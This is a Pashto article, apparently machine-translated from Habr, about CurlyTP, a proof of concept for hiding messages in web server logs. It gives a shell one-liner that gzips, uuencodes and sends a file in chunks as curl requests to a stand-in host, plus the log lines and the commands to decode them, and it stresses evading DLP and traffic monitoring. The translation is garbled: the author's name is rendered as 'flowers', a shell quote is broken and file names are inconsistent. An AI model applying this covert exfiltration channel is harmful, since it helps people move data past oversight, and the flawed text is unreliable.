د ويکيپېډيا د تعريف له مخې، مړې ډراپ د توطيې يوه وسيله ده چې د پټو ځايونو په کارولو سره د خلکو تر منځ د معلوماتو يا ځينو توکو د تبادلې لپاره کار کوي. نظر دا دی چې خلک هیڅکله نه لیدل کیږي - مګر دوی لاهم د عملیاتي خوندیتوب ساتلو لپاره معلومات تبادله کوي.
د پټیدو ځای باید پاملرنه راجلب نه کړي. له همدې امله، په آفلاین نړۍ کې دوی ډیری وختونه د پام وړ شیان کاروي: په دیوال کې یو نرم خښته، د کتابتون کتاب، یا په ونې کې خټکی.
په انټرنیټ کې د کوډ کولو او نومولو ډیری وسیلې شتون لري ، مګر د دې وسیلو کارولو خورا حقیقت پاملرنه راجلبوي. برسېره پردې، دوی ممکن په کارپوریټ یا حکومتي کچه بند شي. چې څه کول پکار دي؟
پراختیا کونکي ریان فلاورز یو په زړه پوری اختیار وړاندیز وکړ - . که تاسو د دې په اړه فکر کوئ، ویب سرور څه کوي؟ غوښتنې ترلاسه کوي، فایلونه مسله کوي او لاګ لیکي. او دا ټولې غوښتنې ثبتوي، حتی غلط!
دا معلومه شوه چې کوم ویب سرور تاسو ته اجازه درکوي په لاګ کې نږدې هر پیغام خوندي کړئ. ګلان حیران شول چې دا څنګه وکاروي.
هغه دا اختیار وړاندې کوي:
- د متن فایل (پټ پیغام) واخلئ او هش (md5sum) محاسبه کړئ.
- موږ یې کوډ کوو (gzip + uuencode).
- موږ سرور ته په قصدي ډول د غلطې غوښتنې په کارولو سره لاګ ته لیکو.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | shد فایل لوستلو لپاره ، تاسو اړتیا لرئ دا عملیات په برعکس ترتیب کې ترسره کړئ: فایل ډیکوډ او غیر زپ کړئ ، هش چیک کړئ (هیش په خلاص چینلونو کې په خوندي ډول لیږدول کیدی شي).
ځایونه سره بدل شوي =+=تر څو په ادرس کې ځای نه وي. برنامه ، چې لیکوال یې CurlyTP بولي ، د بیس 64 کوډ کول کاروي ، لکه د بریښنالیک ضمیمې. غوښتنه د کلیدي کلمې سره ترسره کیږي ?transfer?تر څو ترلاسه کوونکی په اسانۍ سره په لاګونو کې ومومي.
موږ پدې قضیه کې په لاګونو کې څه وینو؟
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"لکه څنګه چې مخکې یادونه وشوه، د پټ پیغام ترلاسه کولو لپاره تاسو اړتیا لرئ چې عملیات په برعکس ترتیب کې ترسره کړئ:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 gپروسه د اتومات کولو لپاره اسانه ده. Md5sum میچ کوي، او د فایل منځپانګې تاییدوي چې هرڅه په سمه توګه کوډ شوي.
طریقه خورا ساده ده. "د دې تمرین ټکی یوازې دا ثابتول دي چې فایلونه د بې ګناه کوچني ویب غوښتنو له لارې لیږدول کیدی شي، او دا په هر ویب سرور کې د ساده متن لاګونو سره کار کوي. په لازمي ډول ، هر ویب سرور د پټیدو ځای دی!" ګلونه لیکي.
البته، دا طریقه یوازې هغه وخت کار کوي چې ترلاسه کوونکي د سرور لاګونو ته لاسرسی ولري. مګر دا ډول لاسرسی چمتو شوی، د بیلګې په توګه، د ډیری کوربه لخوا.
څنګه یې وکاروئ؟
ریان فلاورز وايي چې هغه د معلوماتو امنیت کارپوه نه دی او د CurlyTP لپاره به د احتمالي کارونې لیست ترتیب نه کړي. د هغه لپاره، دا یوازې د مفهوم ثبوت دی چې پیژندل شوي وسیلې چې موږ یې هره ورځ ګورو په غیر دودیز ډول کارول کیدی شي.
په حقیقت کې، دا طریقه د نورو سرور "پټو" په څیر یو شمیر ګټې لري او یا : دا د سرور اړخ یا کوم ځانګړي پروتوکولونو کې ځانګړي ترتیب ته اړتیا نلري - او د هغو کسانو تر مینځ شک نه رامینځته کوي چې ترافیک نظارت کوي. دا امکان نلري چې د SORM یا DLP سیسټم به د کمپریس شوي متن فایلونو لپاره URL سکین کړي.
دا د خدماتو فایلونو له لارې د پیغامونو لیږدولو یوه لاره ده. تاسو کولی شئ په یاد ولرئ چې ځینې پرمختللي شرکتونه څنګه ځای پرځای شوي یا د HTML پاڼو په کوډ کې.
نظر دا و چې یوازې د ویب پراختیا کونکي به دا د ایسټر هګۍ وګوري، ځکه چې یو عادي سړی به سرلیک یا HTML کوډ نه ګوري.
سرچینه: www.habr.com